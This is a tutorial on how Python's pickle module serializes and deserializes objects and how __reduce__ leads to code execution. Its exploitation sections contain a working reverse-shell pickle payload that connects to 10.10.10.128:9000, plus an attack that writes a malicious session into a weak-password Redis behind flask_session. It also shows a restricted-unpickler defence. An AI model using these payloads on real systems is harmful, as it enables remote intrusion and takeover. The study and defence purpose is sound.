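Python Serialization and Deserialization

Python serialization and deserialization, with practical exploitation

  1. Python serialization and deserialization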

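Python serialization is usually done with one of two libraries, cPickle and pickle; pickle ships with the standard library. (cPickle exists only in Python 2. In Python 3 the pickle module automatically uses its C implementation, _pickle, when it is available.)

cPickle is written in C, so it can be up to 1000 times faster than pickle. However, it does not support subclassing of the Pickler() and Unpickler() classes.

"Pickling" is the process of converting a Python object hierarchy into a byte stream, and "unpickling" is the inverse operation, converting a byte stream (from a binary file or a bytes-like object) back into an object hierarchy. The pickle module is not secure against erroneous or maliciously constructed data.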

I. Basic pickle usage

# -*- coding: utf-8 -*-
import pickle

a = '1234'
# pickle writes bytes, so the file must be opened in binary mode
with open('test1.txt', 'wb') as f:
    pickle.dump(a, f)

Contents of test1.txt: [figure not preserved]
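To complete the round trip, the dumped file can be read back with pickle.load. This is a minimal sketch. The temporary directory is an assumption made here so the example does not touch the working directory; the original example writes test1.txt next to the script.

```python
import os
import pickle
import tempfile

a = '1234'

# Assumption of this sketch: use a throwaway directory instead of the
# current directory used in the original example.
with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, 'test1.txt')
    with open(path, 'wb') as f:
        pickle.dump(a, f)          # serialize to the file
    with open(path, 'rb') as f:
        restored = pickle.load(f)  # deserialize from the file

print(restored == a)
```

As the introduction notes, pickle.load should only ever be given data from a trusted source.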

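II. Source code analysis
Serialization
pickle starts by defining constants for the protocol numbers and the opcode markers. The values below are from the Python 3 version analyzed here; Python 3.8 and later use HIGHEST_PROTOCOL = 5 and DEFAULT_PROTOCOL = 4.
HIGHEST_PROTOCOL = 4
DEFAULT_PROTOCOL = 3
STOP = b'.'
PROTO = b'\x80'

The initializer stores a few values, including the protocol number: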

# excerpt from _Pickler.__init__
if protocol is None:
    protocol = DEFAULT_PROTOCOL
if protocol < 0:
    protocol = HIGHEST_PROTOCOL
self.proto = int(protocol)

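Next, follow the dump function:

# excerpt from _Pickler.dump
if self.proto >= 2:
    # header: PROTO opcode followed by the protocol number as one byte
    self.write(PROTO + pack("<B", self.proto))
if self.proto >= 4:
    self.framer.start_framing()
self.save(obj)
self.write(STOP)  # trailer: STOP opcode
self.framer.end_framing()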
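The header and trailer written by dump are easy to see in the output. A small sketch, with the protocol pinned to 3 so that it matches the constants discussed here (the variable names are illustrative only):

```python
import pickle

# Pin protocol 3 explicitly; newer Python versions default to a higher one.
data = pickle.dumps('1234', protocol=3)
print(data)

header = data[:2]    # PROTO opcode + protocol number
body = data[2:-1]    # what save() wrote for the object
stop = data[-1:]     # STOP opcode
print(header, body, stop)
```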

Next, follow the save function.
The code below is simplified and shows only the parts relevant to the serialization flow.

def save(self, obj, save_persistent_id=True):
    # Check the type dispatch table
    t = type(obj)
    f = self.dispatch.get(t)
    if f is not None:
        f(self, obj)  # Call unbound method with explicit self
        return
    # Check private dispatch table if any, or else copyreg.dispatch_table
    reduce = getattr(self, 'dispatch_table', dispatch_table).get(t)
    if reduce is not None:
        rv = reduce(obj)
    else:
        # Check for a class with a custom metaclass; treat as regular class
        try:
            issc = issubclass(t, type)
        except TypeError:  # t is not a class (old Boost; see SF #502085)
            issc = False
        if issc:
            self.save_global(obj)
            return

A different handler is dispatched depending on the type of the object being serialized. Printing the dispatch table makes this clearer:

{<class 'NoneType'>: <function _Pickler.save_none at 0x00000212FF863268>,
 <class 'bool'>: <function _Pickler.save_bool at 0x00000212FF8632F0>,
 <class 'int'>: <function _Pickler.save_long at 0x00000212FF863378>,
 <class 'float'>: <function _Pickler.save_float at 0x00000212FF863400>,
 <class 'bytes'>: <function _Pickler.save_bytes at 0x00000212FF863488>,
 <class 'str'>: <function _Pickler.save_str at 0x00000212FF863510>,
 <class 'tuple'>: <function _Pickler.save_tuple at 0x00000212FF863598>,
 <class 'list'>: <function _Pickler.save_list at 0x00000212FF863620>,
 <class 'dict'>: <function _Pickler.save_dict at 0x00000212FF863730>,
 <class 'set'>: <function _Pickler.save_set at 0x00000212FF863840>,
 <class 'frozenset'>: <function _Pickler.save_frozenset at 0x00000212FF8638C8>,
 <class 'function'>: <function _Pickler.save_global at 0x00000212FF863950>,
 <class 'type'>: <function _Pickler.save_type at 0x00000212FF8639D8>}

The object in this example is a string, so save_str is called.
Follow the save_str function:

# excerpt from _Pickler.save_str
if self.bin:
    # binary protocols: length-prefixed UTF-8
    encoded = obj.encode('utf-8', 'surrogatepass')
    n = len(encoded)
    if n <= 0xff and self.proto >= 4:
        self.write(SHORT_BINUNICODE + pack("<B", n) + encoded)
    elif n > 0xffffffff and self.proto >= 4:
        self._write_large_bytes(BINUNICODE8 + pack("<Q", n), encoded)
    elif n >= self.framer._FRAME_SIZE_TARGET:
        self._write_large_bytes(BINUNICODE + pack("<I", n), encoded)
    else:
        self.write(BINUNICODE + pack("<I", n) + encoded)
else:
    # text protocol 0: escaped, newline-terminated
    obj = obj.replace("\\", "\\u005c")
    obj = obj.replace("\n", "\\u000a")
    self.write(UNICODE + obj.encode('raw-unicode-escape') +
               b'\n')
self.memoize(obj)
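Which branch of save_str runs depends on the protocol. The sketch below lists the opcode names that pickle emits for the same short string under protocols 0, 3 and 4. opcode_names is a helper introduced here for illustration, not part of pickle.

```python
import pickle
import pickletools

def opcode_names(obj, protocol):
    """Return the names of the opcodes pickle emits for obj (illustrative helper)."""
    data = pickle.dumps(obj, protocol=protocol)
    return [op.name for op, arg, pos in pickletools.genops(data)]

for proto in (0, 3, 4):
    # protocol 0 takes the text branch, 3 and 4 the binary branch
    print(proto, opcode_names('1234', proto))
```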

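So the flow pickle follows to serialize an object is roughly:

  1. Initialize the _Pickler class, assign some intermediate variables, and write the header marker (PROTO).
  2. Call the class's save function, which determines the type of the object passed in and handles it with the matching function (save_str, save_long, ...).
  3. Write the result to the output and append the STOP trailer marker.

If the dispatch lookup in step 2 finds no matching method, that is, the object's type is not one of the types in the dispatch table (NoneType, bool, int, float, bytes, str, tuple, list, dict, set, frozenset, function, type), pickle first checks whether __reduce_ex__ exists. If it does, __reduce__ is not looked up; if it does not, pickle falls back to __reduce__. It then checks whether the return value is a string or a tuple: a string goes to save_global, while a tuple goes to save_reduce, which is where the danger begins.

The case where an instance of a user-defined class is not in dispatch (the malicious object):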

import pickle
import os

class A():
    def __reduce__(self):
        a = 'whoami'
        return (os.system, (a,))

a = "test"
print(pickle._Pickler.dispatch.get(type(a)))    # str
print(pickle._Pickler.dispatch.get(type(A)))    # the class itself, i.e. type
print(pickle._Pickler.dispatch.get(type(A())))  # an instance of A

Output:

<function _Pickler.save_str at 0x000001FD12C93510>
<function _Pickler.save_type at 0x000001FD12C939D8>
None

The rest of the save function, which performs the __reduce_ex__ / __reduce__ lookup:

# Check for a __reduce_ex__ method, fall back to __reduce__
reduce = getattr(obj, "__reduce_ex__", None)
if reduce is not None:
    rv = reduce(self.proto)
else:
    reduce = getattr(obj, "__reduce__", None)
    if reduce is not None:
        rv = reduce()
    else:
        raise PicklingError("Can't pickle %r object: %r" %
                            (t.__name__, obj))
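The lookup above can be reproduced by hand. In this sketch, Demo is a hypothetical class whose __reduce__ returns a harmless callable (len) in place of os.system. Calling the inherited __reduce_ex__ ends up calling the overridden __reduce__ and returns its tuple.

```python
class Demo:
    def __reduce__(self):
        # Harmless stand-in for (os.system, ('whoami',))
        return (len, ('whoami',))

obj = Demo()

# Same lookup as in save(): prefer __reduce_ex__, which every object inherits
reduce = getattr(obj, "__reduce_ex__", None)
rv = reduce(3)  # 3 is the protocol number

print(rv)
print(isinstance(rv, tuple))  # a tuple, so save() hands it to save_reduce
```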

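save_reduce serializes the callable and the argument tuple returned by __reduce__ (the tuple goes through save_tuple) and then writes the REDUCE opcode.
The malicious object serializes to the following (the module is nt because the example was run on Windows):
b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'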
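The byte string can be inspected safely with the standard pickletools module, which only parses opcodes and never imports or calls anything. A short sketch, using the payload bytes copied from the text:

```python
import pickletools

payload = b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'

# Print a human-readable disassembly; nothing is executed.
pickletools.dis(payload)

# Collect just the opcode names and the GLOBAL argument.
ops = [(op.name, arg) for op, arg, pos in pickletools.genops(payload)]
names = [name for name, arg in ops]
global_arg = ops[1][1]
print(names)
print(global_arg)
```

The GLOBAL opcode names the callable, BINUNICODE and TUPLE1 build the argument tuple, and REDUCE is the instruction that will call one with the other at load time.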

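Deserialization
Deserialization is also easy to follow.
The malicious object above is used as the example.
Follow the load function: it reads one byte at a time and dispatches on it.
key = read(1)
dispatch[key[0]](self)
After the two-byte PROTO header (\x80\x03), the next opcode is c (GLOBAL, byte value 99), so the dispatcher hands it to load_global.

(99: <function _Unpickler.load_global at 0x00000212FF865488>)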

The load_global function:

def load_global(self):
    module = self.readline()[:-1].decode("utf-8")  # rest of the first line, "nt", is the module
    name = self.readline()[:-1].decode("utf-8")    # the second line, "system", is the name
    klass = self.find_class(module, name)          # resolve module and name to an object
    self.append(klass)                             # push it onto the stack
dispatch[GLOBAL[0]] = load_global

The find_class function (simplified):

def find_class(self, module, name):
    __import__(module, level=0)
    return getattr(sys.modules[module], name)

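find_class returns the system function, load_global pushes it onto the stack, and load_reduce then pops the function and its arguments and executes the malicious code:

def load_reduce(self):
    stack = self.stack
    args = stack.pop()       # the argument tuple
    func = stack[-1]         # the callable pushed by load_global
    stack[-1] = func(*args)  # call it and replace it with the result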
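The whole path (GLOBAL, then REDUCE) can be observed without running a shell command. In this sketch, Demo is a hypothetical class that substitutes the harmless built-in len for os.system. pickle.loads returns whatever the callable returns, which shows that the call happens during loading.

```python
import pickle

class Demo:
    def __reduce__(self):
        # Harmless stand-in for (os.system, ('whoami',))
        return (len, ('whoami',))

data = pickle.dumps(Demo(), protocol=3)
print(data)  # contains the GLOBAL opcode for builtins.len

result = pickle.loads(data)  # load_reduce calls len('whoami')
print(result)
```

Note that the result is not a Demo instance at all: the class only decides what gets called when the data is loaded.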

III. Exploitation

Run the following code on the target machine:

import pickle
import os

class A(object):
    def __reduce__(self):
        a = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",9000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'"""
        return (os.system, (a,))

result = pickle.dumps(A())
pickle.loads(result)  # unpickling runs the command

The attacking machine receives a shell.
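Because find_class is the step that resolves the callable, one commonly documented way to block payloads like this is to subclass pickle.Unpickler and override find_class with an allow-list. The sketch below follows that idea; SAFE_BUILTINS, restricted_loads and is_blocked are names chosen here for illustration, and the allow-list is an assumption rather than a recommendation for any particular application.

```python
import builtins
import io
import pickle

# Assumption: only these builtins may be referenced by a pickle.
SAFE_BUILTINS = {'range', 'complex', 'set', 'frozenset', 'slice'}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Resolve only allow-listed builtins; refuse everything else
        # before anything is imported.
        if module == 'builtins' and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))

def restricted_loads(data):
    """Like pickle.loads(), but with the restricted find_class."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

def is_blocked(data):
    """Return True if restricted_loads refuses the data."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return True
    return False

malicious = b'\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.'
print(is_blocked(malicious))                          # refused at find_class
print(restricted_loads(pickle.dumps([1, 2, range(3)])))  # plain data still loads
```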

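IV. In practice
Example 1: https://segmentfault.com/a/1190000013099825
Flask uses client-side sessions by default. To configure server-side sessions you need flask_session together with Redis, and flask_session serializes the session with pickle.

If Redis allows unauthenticated access or has a weak password, so that we can modify the session, arbitrary code execution follows.

Server: Ubuntu 16.04, 10.10.10.130
Attacker: Kali Linux, 10.10.10.128

Server-side code: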

import redis
import os
from flask import Flask, session
from flask_session import Session

app = Flask(__name__)
SESSION_TYPE = 'redis'
SESSION_PERMANENT = False
SESSION_USE_SIGNER = False
SESSION_KEY_PREFIX = 'session'
SESSION_REDIS = redis.Redis(host='127.0.0.1', port=6379)
SESSION_COOKIE_HTTPONLY = True
PERMANENT_SESSION_LIFETIME = 604800  # 7 days
app.config.from_object(__name__)
Session(app)

@app.route('/')
def hello_world():
    session['name'] = 'test'
    return 'Hello World!'

if __name__ == '__main__':
    app.run(host='0.0.0.0')
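The reason write access to Redis is enough can be sketched without Flask or Redis. Everything in the block below is a simplified assumption: FakeStore is a hypothetical in-memory stand-in for Redis, save_session and open_session only mimic the idea of pickling the session under prefix + session id, and Payload uses the harmless len in place of os.system. It is not flask_session's actual code.

```python
import pickle

KEY_PREFIX = 'session'  # same value as SESSION_KEY_PREFIX in the server code

class FakeStore:
    """Hypothetical in-memory stand-in for Redis (get/set only)."""
    def __init__(self):
        self._data = {}
    def set(self, key, value):
        self._data[key] = value
    def get(self, key):
        return self._data.get(key)

def save_session(store, sid, session):
    # Server side: pickle the session dict under prefix + session id
    store.set(KEY_PREFIX + sid, pickle.dumps(session))

def open_session(store, sid):
    # Server side: unpickle whatever is stored under that key
    raw = store.get(KEY_PREFIX + sid)
    return pickle.loads(raw) if raw is not None else {}

class Payload:
    def __reduce__(self):
        return (len, ('whoami',))  # harmless stand-in for os.system

store = FakeStore()
sid = 'demo-session-id'  # hypothetical session id
save_session(store, sid, {'name': 'test'})
before = open_session(store, sid)

# An attacker with write access to the store overwrites the value...
store.set(KEY_PREFIX + sid, pickle.dumps(Payload()))
# ...and the next request that opens the session runs the callable.
after = open_session(store, sid)

print(before, after)
```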

Visit the server to generate a session.

Look up the session in Redis.

Modify the session:

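import pickle
import os
import redis

class A(object):
    def __reduce__(self):
        # NOTE: the next line is truncated in the source ('$' marks the cut).
        # It appears to be the reverse-shell one-liner from section III, run with python3.
        a = """python3 -c 'import socket,subprocess,os;s=socket.socket(socket.A$
        return (os.system, (a,))

b = A()
result = pickle.dumps(b)
r = redis.Redis(host='10.10.10.130', port=6379, password='123456')
# overwrite the session value stored under prefix + session id
r.set('session7ed80af9-014f-45ea-9349-8b3aba0584b1', result)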

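Refresh the browser to get the shell.

V. Notes

The pickle analyzed in this article is the one bundled with Python 3.x, which differs from Python 2.x in a few ways:
1. The source code handles protocol versions slightly differently.
2. Because Python 2 and Python 3 differ in how they treat new-style and classic classes:
In Python 2 the class must explicitly inherit from object, that is, be a new-style class, to reach the save_reduce function; otherwise the payload does not execute.
In Python 3 there is no distinction between new-style and classic classes, so explicitly inheriting from object is not needed.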

https://segmentfault.com/a/1190000013099825
https://segmentfault.com/a/1190000013214956
https://www.cnblogs.com/baby-lily/p/10990026.html